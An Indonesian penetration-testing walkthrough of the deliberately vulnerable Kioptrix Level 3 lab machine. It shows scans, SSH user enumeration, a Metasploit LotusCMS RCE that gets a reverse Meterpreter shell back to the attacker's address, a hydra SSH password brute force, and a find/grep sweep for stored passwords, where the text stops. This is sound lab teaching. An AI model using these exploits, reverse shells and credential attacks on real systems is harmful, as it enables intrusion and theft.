Lanjutan kisah serial kioptrix kali ini adalah tentang credential attack atau serangan terhadap identitas seseorang. Credential dibutuhkan dalam proses authentikasi ketika seseorang akan memasuki sebuah sistem. Ia juga dibutuhkan ketika seseorang yang berada di dalam sistem ingin mengakses informasi tertentu. Prinsip dalam keamanan informasi terkait pengelolaan credential adalah “Need To Know”. Maksudnya, informasi akan diberikan sesuai dengan tanggung jawab, wewenang dan deskripsi pekerjaan. Mari kita ikuti perjalanan mencari kerentanan pada mesin Kioptrix-03 ini. Semoga bermanfaat.
Tahap Pertama: Scanning dan Enumeration
Seperti pada kisah terdahulu, kita akan awali perjalanan kita bersama nmap. Sebuah perangkat yang terbukti telah berhasil membantu Neo menyelesaikan berbagai misi dalam trilogi film The Matrix. Berdasarkan informasi yang dihimpun oleh nmap, mesin ini memiliki fungsi sebagai web server (Apache 2.2.8 dan PHP ) dan menggunakan SSH (OpenSSH 4.7p1) untuk melakukan administrasi jarak jauh terhadap server.
root@kali2:~# nmap -p- -A 192.168.216.150
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-20 19:43 PDT
Nmap scan report for 192.168.216.150 (192.168.216.150)
Host is up (0.00080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:BB:39:CC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 192.168.216.150 (192.168.216.150)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.09 seconds
root@kali2:~#
Dengan bantuan nikto, dirb dan burpsuite kita mendapatkan cukup banyak file dan folder pada mesin Kioptrix-03. Namun demikian hanya ada tiga temuan yang menarik untuk ditelusuri lebih lanjut yaitu folder gallery kemudian phpmyadmin dan login form pada aplikasi LotusCMS (index.php). Perhatikan beberapa gambar berikut ini, khusus untuk folder gallery agar dilakukan penambahan kioptrix3.com pada file /etc/hosts dengan merujuk pada alamat IP Address dari Kali Linux milik kita.
root@kali2:~# dirb http://192.168.216.150
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Apr 20 19:49:35 2020
URL_BASE: http://192.168.216.150/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.216.150/ ----
==> DIRECTORY: http://192.168.216.150/cache/
==> DIRECTORY: http://192.168.216.150/core/
+ http://192.168.216.150/data (CODE:403|SIZE:326)
+ http://192.168.216.150/favicon.ico (CODE:200|SIZE:23126)
==> DIRECTORY: http://192.168.216.150/gallery/
+ http://192.168.216.150/index.php (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.216.150/modules/
==> DIRECTORY: http://192.168.216.150/phpmyadmin/
+ http://192.168.216.150/server-status (CODE:403|SIZE:335)
==> DIRECTORY: http://192.168.216.150/style/
---- Entering directory: http://192.168.216.150/cache/ ----
+ http://192.168.216.150/cache/index.html (CODE:200|SIZE:1819)
---- Entering directory: http://192.168.216.150/core/ ----
==> DIRECTORY: http://192.168.216.150/core/controller/
+ http://192.168.216.150/core/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.216.150/core/lib/
==> DIRECTORY: http://192.168.216.150/core/model/
==> DIRECTORY: http://192.168.216.150/core/view/
---- Entering directory: http://192.168.216.150/gallery/ ----
+ http://192.168.216.150/gallery/index.php (CODE:500|SIZE:5650)
==> DIRECTORY: http://192.168.216.150/gallery/photos/
==> DIRECTORY: http://192.168.216.150/gallery/themes/
---- Entering directory: http://192.168.216.150/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.150/phpmyadmin/ ----
+ http://192.168.216.150/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.216.150/phpmyadmin/index.php (CODE:200|SIZE:8136)
==> DIRECTORY: http://192.168.216.150/phpmyadmin/js/
==> DIRECTORY: http://192.168.216.150/phpmyadmin/lang/
+ http://192.168.216.150/phpmyadmin/libraries (CODE:403|SIZE:342)
+ http://192.168.216.150/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.216.150/phpmyadmin/scripts/
==> DIRECTORY: http://192.168.216.150/phpmyadmin/themes/
---- Entering directory: http://192.168.216.150/style/ ----
+ http://192.168.216.150/style/admin.php (CODE:200|SIZE:356)
+ http://192.168.216.150/style/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.216.150/core/controller/ ----
+ http://192.168.216.150/core/controller/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.216.150/core/lib/ ----
+ http://192.168.216.150/core/lib/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.216.150/core/model/ ----
+ http://192.168.216.150/core/model/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.216.150/core/view/ ----
+ http://192.168.216.150/core/view/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.216.150/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.150/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.150/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.150/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.150/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.150/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Apr 20 19:50:05 2020
DOWNLOADED: 46120 - FOUND: 17
root@kali2:~#
root@kali2:~# nikto -h http://192.168.216.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.216.150
+ Target Hostname: 192.168.216.150
+ Target Port: 80
+ Start Time: 2020-04-20 19:51:03 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 12:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2020-04-20 19:51:36 (GMT-7) (33 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali2:~#
Selain itu, ada tambahan informasi menarik. Berdasarkan penelusuran pada folder gallery, setelah kita memasukkan comment pada blog ternyata ada informasi bahwa kemungkinan besar ada user account bernama loneferret (gambar 4). Namun hal tersebut harus diverifikasi keberadaannya.
Untuk memastikan keberadaan user account loneferret tersebut, maka kita akan menggunakan perangkat metasploit. Modul auxiliary yang akan digunakan bernama auxiliary/scanner/ssh/ssh_enumusers. Berikut ini adalah hasil eksekusi dari perangkat lunak tersebut.
msf5 auxiliary(scanner/ssh/ssh_enumusers) > show options
Module options (auxiliary/scanner/ssh/ssh_enumusers):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_FALSE false no Check for false positives (random username)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
THRESHOLD 10 yes Amount of seconds needed before a user is considered found (timing attack only)
USERNAME loneferret no Single username to test (username spray)
USER_FILE no File containing usernames, one per line
Auxiliary action:
Name Description
---- -----------
Malformed Packet Use a malformed packet
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.216.150
RHOSTS => 192.168.216.150
msf5 auxiliary(scanner/ssh/ssh_enumusers) >
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] 192.168.216.150:22 - SSH - Using malformed packet technique
[*] 192.168.216.150:22 - SSH - Starting scan
[+] 192.168.216.150:22 - SSH - User 'loneferret' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) >
Berdasarkan verifikasi dari metasploit dapat disimpulkan bahwa user account bernama loneferret adalah nyata adanya dan penting untuk ditindaklanjuti pada aktivitas tahap selanjutnya.
Sedangkan terkait informasi untuk sistem operasi, besar kemungkinan server Kioptrix03 menggunakan Distro Ubuntu dengan kernel antara 2.6.9 – 2.6.33. Belum diketahui lebih lanjut informasi tentang versi Ubuntu yang digunakan dan jenis prosesor pada server tersebut, 32 atau 64 bit? Upaya identifikasi sistem operasi dilakukan dengan nmap menggunakan opsi -O serta –osscan-guess. Hasil eksekusi perangkat tersebut dapat dilihat sebagaimana berikut:
root@kali2:~# nmap -O --osscan-guess 192.168.216.150
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-20 23:07 PDT
Nmap scan report for kioptrix3.com (192.168.216.150)
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:BB:39:CC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds
Tahap Kedua : Mapping Attack Surface
Berdasarkan pencarian, pengumpulan dan verifikasi informasi pada tahap sebelumnya, maka peta potensi kerentanan dan peluang serangan siber dapat dilakukan. Pada gambar 4 berikut ini tampak bahwa sistem operasi beserta kedua layanan yang ada (HTTP dan SSH) memiliki banyak peluang serangan siber yang penting untuk ditelusuri dan ditindalnjuti.
Tahap Ketiga : Exploitation dan Post-Exploitation
Sasaran taktis untuk kegiatan Exploitation adalah untuk mendapatkan limited shell. Sedangkan sasaran taktis untuk kegiatan Post-Exploitation adalah untuk mendapatkan hak akses dari sistem administrator atau root. Namun demikian kegiatan peningkatan hak akses pada Post-Exploitation tidak dibutuhkan apabila kita telah mendapatkan hak akses sistem administrator pada kegiatan Exploitation. Kisah Kioptrix1 adalah contoh kegiatan exploitation tanpa perlu melakukan peningkatan hak akses lagi (privilege escalation) dengan memanfaatkan kerentanan Remote Code Execution (RCE).
Kita mulai dengan menelusuri kemungkinan adanya peluang serangan dengan Remote Code Execution atau RCE berdasarkan Mapping Attack Surface yang telah dilakukan pada tahap sebelumnya.
Berdasarkan penelusuran yang dilakukan ternyata potensi RCE pada sistem operasi tidak ditemukan. Meskipun besar kemungkinan ada kerentanan Buffer Over Flow pada kernel namun exploit yang ada untuk ditujukan untuk meningkatkan hak akses menjadi root (atau privilege escalation). Sedangkan potensi RCE pada OpenSSH 4.7p1 tidak ditemukan.
Selanjutnya potensi RCE pada layanan HTTP tidak ditemukan pada phpmyadmin maupun pada Apache. Potensi tersebut ternyata ada pada LotusCMS. Hal ini terverifikasi dengan menggunakan perangkat metasploit, yaitu menggunakan modul exploit bernama exploit/multi/http/lcms_php_exec. Berikut ini adalah hasil eksekusi pada metasploit dimana kita berhasil mendapatkan limited shell pada server Kioptrix3 dengan nama user www-data:
root@kali2:~# msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1066 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > search lotuscms
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 exploit/multi/http/lcms_php_exec 2011-03-03 excellent Yes LotusCMS 3.0 eval() Remote Command Execution
msf5 > use exploit/multi/http/lcms_php_exec
msf5 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /lcms/ yes URI
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.216.150
RHOSTS => 192.168.216.150
msf5 exploit(multi/http/lcms_php_exec) > set URI /index.php?system=Admin&page=loginSubmit
URI => /index.php?system=Admin&page=loginSubmit
msf5 exploit(multi/http/lcms_php_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 generic/custom normal No Custom Payload
2 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)
5 multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)
6 php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl)
7 php/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6
8 php/bind_php normal No PHP Command Shell, Bind TCP (via PHP)
9 php/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6
10 php/download_exec normal No PHP Executable Download and Execute
11 php/exec normal No PHP Execute Command
12 php/meterpreter/bind_tcp normal No PHP Meterpreter, Bind TCP Stager
13 php/meterpreter/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6
14 php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
15 php/meterpreter/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support
16 php/meterpreter/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager
17 php/meterpreter/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager
18 php/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl)
19 php/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP)
msf5 exploit(multi/http/lcms_php_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/http/lcms_php_exec) > set LHOST 192.168.216.149
LHOST => 192.168.216.149
msf5 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.216.150 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /index.php?system=Admin&page=loginSubmit yes URI
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.216.149 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf5 exploit(multi/http/lcms_php_exec) > exploit
[*] Started reverse TCP handler on 192.168.216.149:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Sending stage (38247 bytes) to 192.168.216.150
[*] Meterpreter session 1 opened (192.168.216.149:4444 -> 192.168.216.150:49752) at 2020-04-21 06:21:05 -0700
id
meterpreter >
meterpreter > id
[-] Unknown command: id.
meterpreter > id
[-] Unknown command: id.
meterpreter > shell
Process 6335 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
hostname
Kioptrix3
pwd
/home/www/kioptrix3.com
Peluang serangan siber lainnya yang patut kita telusuri selain RCE, adalah serangan brute force pada account loneferret pada layanan SSH. Kita akan menggunakan perangkat hydra untuk melakukan online cracking. Sedangkan wordlist yang akan kita gunakan berasal dari kompilasi credential bernama Seclist pada link https://github.com/danielmiessler/SecLists. Opsi yang kita gunakan pada hydra adalah -l karena menggunakan satu user saja, kemudian opsi -P karena kita menggunakan wordlist untuk password serta opsi -t untuk mengoptimalkan concurrent task selama aktivitas cracking berlangsung. Berikut ini adalah hasil cracking setelah perangkat hydra dijalankan:
root@kali2:~# hydra -l loneferret -P ~/Tools/SecLists/Passwords/Common-Credentials/10k-most-common.txt ssh://192.168.216.150 -t 4
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-21 06:54:19
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 10000 login tries (l:1/p:10000), ~2500 tries per task
[DATA] attacking ssh://192.168.216.150:22/
[STATUS] 52.00 tries/min, 52 tries in 00:01h, 9948 to do in 03:12h, 4 active
[22][ssh] host: 192.168.216.150 login: loneferret password: starwars
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-21 06:56:04
root@kali2:~#
root@kali2:~# ssh loneferret@192.168.216.150
loneferret@192.168.216.150's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
loneferret@Kioptrix3:~$
Berdasarkan hasil cracking dengan hydra, kita berhasil mendapatkan password dari loneferret, yaitu starwars. Setelah dilakukan login pada layanan SSH, kita berhasil masuk ke dalam server Kioptrix3. Dengan demikian kita berhasil mendapatkan limited shell, sebagaimana halnya telah kita lakukan melalui RCE pada Lotuscms. Teknik yang kita gunakan untuk menyerang credential pada SSH ini disebut Password Spray Attack. Jenis serangan ini memfokuskan pada satu satu credential saja, ketimbang menggunakan wordlist dengan banyak user name yang belum tentu benar.
Dengan demikian ada dua cara dalam kegiatan exploitation untuk mendapatkan limited shell. Perbedaan diantara kedua cara tersebut adalah, apabila menggunakan serangan RCE pada Lotuscms maka kita akan mendapatkan credential bernama www-data. Sedangkan jika kita menggunakan serangan brute force pada layanan SSH maka kita mendapatkan credential loneferret. Kita bisa memilih diantara kedua cara tersebut, namun pada tulisan ini kita akan menggunakan cara kedua.
Setelah kita berhasil login dengan credential dari loneferret, maka kita akan melakukan kegiatan Post-Exploitation untuk meningkatkan hak akses menjadi root atau sistem administrator. Kita awali dengan mencari informasi sensitif berupa credential dengan menggunakan perintah find, yaitu: find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null. Maksud dari perintah ini adalah mencari pada file berekstensi *.php dengan kedalaman sub-folder lima tingkat, kemudian mencari kata password dengan menggunakan perintah grep. Berikut ini adalah hasil eksekusi dari perintah tersebut.
loneferret@Kioptrix3:~$ find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null
/usr/share/phpmyadmin/libraries/header.inc.php:101: } elseif (isset($js_to_run) && $js_to_run == 'user_password.js') {
/usr/share/phpmyadmin/libraries/header.inc.php:111: <script src="./js/user_password.js" type="text/javascript"></script>
/usr/share/phpmyadmin/libraries/common.inc.php:350: 'user_password.php',
/usr/share/phpmyadmin/libraries/common.inc.php:408: 'pma_servername', 'pma_username', 'pma_password',
/usr/share/phpmyadmin/libraries/common.inc.php:824: $cfg['Server']['password'], true);
/usr/share/phpmyadmin/libraries/common.inc.php:832: $cfg['Server']['password'], false);
/usr/share/phpmyadmin/libraries/config.default.php:58: * The 'cookie' auth_type uses blowfish algorithm to encrypt the password. If
/usr/share/phpmyadmin/libraries/config.default.php:162: * MySQL password (only needed with 'config' auth_type)
/usr/share/phpmyadmin/libraries/config.default.php:164: * @global string $cfg['Servers'][$i]['password']
/usr/share/phpmyadmin/libraries/config.default.php:166:$cfg['Servers'][$i]['password'] = '';
/usr/share/phpmyadmin/libraries/config.default.php:190: * Whether to try to connect without password
/usr/share/phpmyadmin/libraries/config.default.php:192: * @global boolean $cfg['Servers'][$i]['nopassword']
/usr/share/phpmyadmin/libraries/config.default.php:194:$cfg['Servers'][$i]['nopassword'] = false;
/usr/share/phpmyadmin/libraries/config.default.php:624: * show change password link
/usr/share/phpmyadmin/libraries/config.default.php:2173: * @global string $cfg['SQLValidator']['password']
/usr/share/phpmyadmin/libraries/config.default.php:2175:$cfg['SQLValidator']['password'] = '';
/usr/share/phpmyadmin/libraries/sqlvalidator.lib.php:28: * Also set a username and password if you have a private one
/usr/share/phpmyadmin/libraries/sqlvalidator.lib.php:70: // The class defaults to anonymous with an empty password
/usr/share/phpmyadmin/libraries/sqlvalidator.lib.php:73: $srv->setCredentials($cfg['SQLValidator']['username'], $cfg['SQLValidator']['password']);
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:46: var $password;
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:97: function _openSession($obj, $username, $password,
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:103: $use_array = array("a_userName" => $username, "a_password" => $password, "a_callingProgram" => $calling_program, "a_callingProgramVersion" => $calling_program_version, "a_targetDbms" => $target_dbms, "a_targetDbmsVersion" => $target_dbms_version, "a_connectionTechnology" => $connection_technology, "a_connectionTechnologyVersion" => $connection_technology_version, "a_interactive" => $interactive);
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:107: /* $ret = $obj->openSession($username, $password,
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:177: $this->password = '';
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:195: * @param string the password
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:199: function setCredentials($username, $password)
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:202: $this->password = $password;
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:342: $this->session_data = $this->_openSession($this->service_link, $this->username, $this->password,
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:4: * Displays form for password change
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:6: * @version $Id: display_change_password.lib.php 10796 2007-10-16 07:09:50Z cybot_tm $
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:23: <fieldset id="fieldset_change_password">
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:38: <input type="password" name="pma_pw" id="pw_pma_pw" size="10" class="textfield" <?php echo $chg_evt_handler; ?>="nopass[1].checked = true" />
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:41: <input type="password" name="pma_pw2" id="pw_pma_pw2" size="10" class="textfield" <?php echo $chg_evt_handler; ?>="nopass[1].checked = true" />
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:73: <fieldset id="fieldset_change_password_footer" class="tblFooters">
/usr/share/phpmyadmin/libraries/common.lib.php:479: // if the config password is wrong, or the MySQL server does not
/usr/share/phpmyadmin/libraries/common.lib.php:481: // username/password
/usr/share/phpmyadmin/user_password.php:5: * @version $Id: user_password.php 10501 2007-07-18 15:32:08Z lem9 $
/usr/share/phpmyadmin/user_password.php:29: * If the "change password" form has been submitted, checks for valid values
/usr/share/phpmyadmin/user_password.php:51: $err_url = 'user_password.php?' . $common_url_query;
/usr/share/phpmyadmin/user_password.php:55: $sql_query = 'SET password = ' . (($pma_pw == '') ? '\'\'' : $hashing_function . '(\'' . preg_replace('@.@s', '*', $pma_pw) . '\')');
/usr/share/phpmyadmin/user_password.php:56: $local_query = 'SET password = ' . (($pma_pw == '') ? '\'\'' : $hashing_function . '(\'' . PMA_sqlAddslashes($pma_pw) . '\')');
/usr/share/phpmyadmin/user_password.php:59: // Changes password cookie if required
/usr/share/phpmyadmin/user_password.php:60: // Duration = till the browser is closed for password (we don't want this to be saved)
/usr/share/phpmyadmin/user_password.php:87: * If the "change password" form hasn't been submitted or the values submitted
/usr/share/phpmyadmin/user_password.php:91:$js_to_run = 'user_password.js';
/usr/share/phpmyadmin/user_password.php:100:require_once './libraries/display_change_password.lib.php';
/usr/share/phpmyadmin/server_privileges.php:656: . $spaces . '<label for="select_pred_password">' . "\n"
/usr/share/phpmyadmin/server_privileges.php:660: . $spaces . ' <select name="pred_password" id="select_pred_password" title="' . $GLOBALS['strPassword'] . '"' . "\n"
/usr/share/phpmyadmin/server_privileges.php:671: . $spaces . '<input type="password" id="text_pma_pw" name="pma_pw" title="' . $GLOBALS['strPassword'] . '" onchange="pred_password.value = \'userdefined\';" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:678: . $spaces . '<input type="password" name="pma_pw2" id="text_pma_pw2" title="' . $GLOBALS['strReType'] . '" onchange="pred_password.value = \'userdefined\';" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:681: . $spaces . '<label for="button_generate_password">' . "\n"
/usr/share/phpmyadmin/server_privileges.php:685: . $spaces . ' <input type="button" id="button_generate_password" value="' . $GLOBALS['strGenerate'] . '" onclick="suggestPassword()" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:686: . $spaces . ' <input type="button" id="button_copy_password" value="' . $GLOBALS['strCopy'] . '" onclick="suggestPasswordCopy(this.form)" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:712: // uses $password
/usr/share/phpmyadmin/server_privileges.php:713: if (!isset($password) && isset($Password)) {
/usr/share/phpmyadmin/server_privileges.php:714: $password=$Password;
/usr/share/phpmyadmin/server_privileges.php:773: if ($pred_password != 'none' && $pred_password != 'keep') {
/usr/share/phpmyadmin/server_privileges.php:782: if ($pred_password == 'keep' && !empty($password)) {
/usr/share/phpmyadmin/server_privileges.php:783: $real_sql_query .= ' IDENTIFIED BY PASSWORD \'' . $password . '\'';
/usr/share/phpmyadmin/server_privileges.php:785: $create_user_real .= ' IDENTIFIED BY PASSWORD \'' . $password . '\'';
/usr/share/phpmyadmin/server_privileges.php:866: // we put the query containing the hidden password in
/usr/share/phpmyadmin/server_privileges.php:1093: * Updates the password
/usr/share/phpmyadmin/server_privileges.php:1096: // similar logic in user_password.php
/usr/share/phpmyadmin/server_privileges.php:1114: // in $sql_query which will be displayed, hide the password
/usr/share/phpmyadmin/server_privileges.php:1220: // when there is a query containing a hidden password, take it
/usr/share/phpmyadmin/server_privileges.php:1921: require_once './libraries/display_change_password.lib.php';
/usr/share/phpmyadmin/config.sample.inc.php:14: * This is needed for cookie based authentication to encrypt password in
/usr/share/phpmyadmin/scripts/setup.php:708: * 'password' means password input.
/usr/share/phpmyadmin/scripts/setup.php:735: } elseif ($val[3] == 'password') {
